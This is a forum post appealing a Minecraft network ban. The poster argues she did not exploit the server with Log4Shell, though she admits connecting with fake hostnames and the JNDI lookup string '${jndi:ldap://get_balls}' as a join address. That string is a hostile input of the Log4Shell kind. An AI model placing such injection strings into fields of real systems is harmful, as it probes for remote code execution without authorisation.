Hey guys,
So if you haven't heard, about a month ago I was banned from the network for "Abuse of an **exploit** in Plan to create fake hostnames." While this is partly true, some hostnames I joined with were legitimate and probably expired when they were checked (looking at "tf.nocom.pro" specifically), but that is not what I'm coming to talk about; it's rather something different. So basically I only got banned 2 months for doing this fake hostname stuff, but my ban is 6 months in duration. The reason for this is that 4 months were added on for attempting to "exploit the server using Log4Shell", which is simply not true, and I have evidence from my side to support that the server would not have been vulnerable at the time. I connected with the log4j string (the string in question is "${jndi:ldap://get_balls}") on the 12th of April (2022); this was at the same time I connected with the other addresses leading to the 2 months, but there are a few issues:
1. Log4Shell (CVE-2021-44228) was discovered on the 21st of November (2021) and received patches to the affected libraries on the 6th of December (2021). From a security standpoint, many libraries that use Log4J would have been updated instantly on this date or shortly after; there is NO reason to have this unpatched 4 months LATER on any part of a system using Log4J. All people who play Minecraft would have received an updated version too, which patches this on the client side.
2. Now I don't think Plan is logging anything with Log4J to the logs, so there should be no issue, right? If that is the case, Plan would not have responded to such addresses (if I logged in during the vulnerable period, which is unlikely since I didn't want to touch Minecraft while such an exploit was roaming around freely) and there should be no reason to respond to this. Now it may have affected client-side stuff, but it should not have done anything, since why would you want to log join addresses to a log in the first place?
3. The following target "get_balls" is unresolvable and does not exist, and is a clearly implied joke as the words suggest. Unless it has been routed internally to lead somewhere, it would not have, and if somehow parts of the server were still vulnerable to this 4 months later (this would have been extremely unlikely for reasons I will cover in the next point) it would have simply thrown a harmless error in console and server operation would have continued as normal with no effects. Why this was considered able to exploit the server in the first place, I don't know.
4. From places in the TF Discord server (developer discussion channel and announcements), messages imply that the issue was known and measures were taken on the TF Network at the time to mitigate attacks like this; you can find this in the announcements channel on the Discord server. I am assuming that TF would have taken action on mitigating Log4Shell and updating to safer versions of Paper, so there is no real reason to say that it would have caused issues when I logged in with it on the 12th of April, which relative to this date was 4 months after all this stuff had occurred.
5. TotalFreedom would have updated stuff using Log4J such as plugins and server software (Paper/Scissors and all that), which include patched versions not affected by Log4Shell, so I am assuming Plan would have also been updated. But there is no reason to believe that issues would have been thrown by Plan, since it should have no reason to be using the Log4J library when someone is connecting with a join address.
These are all the points I'd like to mention, and now I have an image to prove that I joined with those addresses on that date from my active Minecraft instance, which I have been using since October of 2021; you can view it at the bottom of this thread.
I used the "zgrep" command in Linux, which if you are not familiar is able to look through compressed archives (Minecraft stores logs in .log.gz files), and thus I was able to make it scrub through all of the log entries from ALL of my MultiMC instances to search for the ldap string. According to the results shown by zgrep, there are three results from a log on the 12th of April 2022 in the instance I stated I was using from October of 2021 above; I only used it three times and stopped using it after that, as I had no more reasons to be joining with fake addresses. In the image I also open up the properties of the three compressed log archives, which show the date the logs were last modified. Minecraft logs show down to the second when something is happening, and it is extremely unlikely I made this up, as there is no way that you can remember events down to the second, especially something unimportant like this. You can also see the discovery date and patched date from a Google tab in Firefox, which shows the information about the CVE/exploit, to accompany my points about the Log4Shell discovery date and patched date above. When this exploit was active I was watching it closely, as I had some projects running on Java that were not using log4j, but just in case I needed to update some dependencies. To also prove my point: if you were to check the server logs at this date (which would have been the hub server, as there is no way to route to the freedom server directly) you can see that I had logged in at these exact times shown in the Minecraft logs.
I'd also like to state that I clearly had no ill intentions of doing anything that would harm the server, as that is not my thing. I respect the rules of online communities, and in my case no such rules were broken (but I may be mistaken); you would clearly know it was a joke and that no such address or thing exists as "get_balls".
I'd like it if this was looked into a bit more, but what I'm trying to say is that the server would not have been vulnerable to this.
I also apologize if this is in the wrong topic to publish this under, as I don't really write forum posts often. This thread is replacing my "An issue regarding my ban" thread (which I haven't received much clarity on) with a more detailed one proving that I am not guilty of exploiting the server with this string.
Anyway this is all I've got to say and I'll see you soon,
Eva.
You may find the image I was talking about above below: